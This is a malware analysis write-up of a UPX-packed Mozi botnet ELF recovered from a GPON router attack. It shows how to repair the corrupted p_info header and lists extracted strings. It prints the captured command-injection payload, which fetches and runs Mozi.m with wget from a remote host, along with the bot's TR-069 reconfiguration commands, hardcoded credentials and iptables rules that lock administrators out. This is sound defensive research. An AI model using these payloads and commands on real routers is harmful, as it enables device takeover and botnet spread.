A ELF file was recovered from GPON Router authentication bypass and command injection attempt.

SHA256 Hash: 832fb4090879c1bebe75bea939a9c5724dbf87898febd425f94f7e03ee687d3b

Payload: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=“;wget+hxxp://116.114.9 5[.]110:46049/Mozi.m +-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0

36/58 Detections on VirusTotal: https://www.virustotal.com/gui/file/832fb4090879c1bebe75bea939a9c5724dbf87898febd425f94f7e03ee687d3b/detection

A Hex dump via “xxd” verifies the ELF file is UPX packed.

Unpack attempts via “upx -d” fail due to the error: “p_info corrupted”

ELF File Fails to Unpack.

“p_info” is a 12-byte section in the packed program header. Below, it can be observed filled with Zero.

“p_info” is the size of the unpacked file. “p_info” and “p_filesize” are the same. “p_filesize” is found at the end of file, shown below in blue.

Hex: 00042A7C(Big-endian)

Below, Bytes 5 – 12 in “p_info” are replaced with the value found in “p_filesize”.

The ELF file is now able to be successfully unpacked. Shown Below.

ELF File with Fixed “p_info” Section

13/58 Detections on VirusTotal: https://www.virustotal.com/gui/file/00fc81a4279c2141ba438ee0dabba07d5bdcdde090d0fc87a241111e488aa202/detection

ELF File Unpacked:

24/59 Detections on VirusTotal: https://www.virustotal.com/gui/file/86a159452462eb3143a74d780d134af95816e44e0954e165742edd394240b535/detection

Note: The file size of the unpacked Elf file on VirusTotal is recognized as 266.62 KB. The Hex: 00042A7C(Big-endian) in Decimal is 273020. 273020 bytes / 1024 = 266.62 KB

String Analysis via Floss:

Domains:
baidu.com
bttracker.debian.org
dht.transmissionbt.com
ntp.ubuntu.com
pool.ntp.org
purenetworks.com
router.bittorrent.com
router.utorrent.com
time.nist.gov
w3.org

IP Addresses:
212.129.33[.]59:6881
82.221.103[.]244:6881
130.239.18[.]159:6881
87.98.162[.]88:6881

Exploits:
gpon
realtek
netgear
huawei
tr064
hnap
camcrossweb
camjaws
dlink
r7064
vacron

Sendcmd & Commands:
sendcmd 1 DB set MgtServer 0 Tr069Enable 1
sendcmd 1 DB set PdtMiddleWare 0 Tr069Enable 0
sendcmd 1 DB set MgtServer 0 URL http://127.0.0.1
sendcmd 1 DB set MgtServer 0 UserName notitms
sendcmd 1 DB set MgtServer 0 ConnectionRequestUsername notitms
sendcmd 1 DB set MgtServer 0 PeriodicInformEnable 0
sendcmd 1 DB save
cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL “http://127.0.0.1”
cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword “acsMozi”
/proc/self/oom_score_adj -1000
echo 3 > /proc/sys/vm/drop_caches
*Username(“notitms”) and Password(“acsMozi”) found for Management Server.

Iptables Commands:
iptables -D INPUT -p tcp –dport %d -j ACCEPT
iptables -D OUTPUT -p tcp –sport %d -j ACCEPT
iptables -D PREROUTING -t nat -p tcp –dport %d -j ACCEPT
iptables -D POSTROUTING -t nat -p tcp –sport %d -j ACCEPT
iptables -I INPUT -p tcp –dport %d -j ACCEPT
iptables -I OUTPUT -p tcp –sport %d -j ACCEPT
iptables -I PREROUTING -t nat -p tcp –dport %d -j ACCEPT
iptables -I POSTROUTING -t nat -p tcp –sport %d -j ACCEPT
iptables -I INPUT -p tcp –dport 35000 -j DROP
iptables -I INPUT -p tcp –dport 50023 -j DROP
iptables -I OUTPUT -p tcp –sport 50023 -j DROP
iptables -I OUTPUT -p tcp –sport 35000 -j DROP
iptables -I INPUT -p tcp –dport 7547 -j DROP
iptables -I OUTPUT -p tcp –sport 7547 -j DROP
iptables -I INPUT -p tcp –dport 58000 -j DROP
iptables -I OUTPUT -p tcp –sport 58000 -j DROP
iptables -I INPUT -p udp –dport %d -j ACCEPT
iptables -I OUTPUT -p udp –sport %d -j ACCEPT
iptables -I PREROUTING -t nat -p udp –dport %d -j ACCEPT
iptables -I POSTROUTING -t nat -p udp –sport %d -j ACCEPT
iptables -I INPUT -p tcp –dport 22 -j DROP
iptables -I INPUT -p tcp –dport 23 -j DROP
iptables -I INPUT -p tcp –dport 2323 -j DROP
iptables -I OUTPUT -p tcp –sport 22 -j DROP
iptables -I OUTPUT -p tcp –sport 23 -j DROP
iptables -I OUTPUT -p tcp –sport 2323 -j DROP

User Agents:
Mozilla/4.0 (Compatible; MSIE 8.0; Windows NT 5.2; Trident/6.0)
Mozilla/4.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; pl) Opera 11.00
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; en) Opera 11.00
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; ja) Opera 11.00
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; de) Opera 11.01
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; fr) Opera 11.00
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/601.1.56 (KHTML, like Gecko) Version/9.0 Safari/601.1.56
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.7 (KHTML, like Gecko) Version/9.0.1 Safari/601.2.7
Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)
Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51
Opera/9.80 (X11; Linux i686; Ubuntu/14.10) Presto/2.12.388 Version/12.16
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A
Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36
Mozilla/5.0 (Linux; Android 4.4.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36
Mozilla/5.0 (Linux; Android 4.4.3; HTC_0PCV2 Build/KTU84L) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
Mozilla/4.0 (compatible; MSIE 8.0; X11; Linux x86_64; pl) Opera 11.00
Mozilla/4.0 (compatible; MSIE 9.0; Windows 98; .NET CLR 3.0.04506.30)
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/4.0; GTB7.4; InfoPath.3; SV1; .NET CLR 3.4.53360; WOW64; en-US)
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0; FDM; MSIECrawler; Media Center PC 5.0)
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 4.4.58799; WOW64; en-US)
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts)
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0) Gecko/20100101 Firefox/21.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:24.0) Gecko/20100101 Firefox/24.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko/20100101 Firefox/33.0

Corrupt UPX Packed ELF File Analysis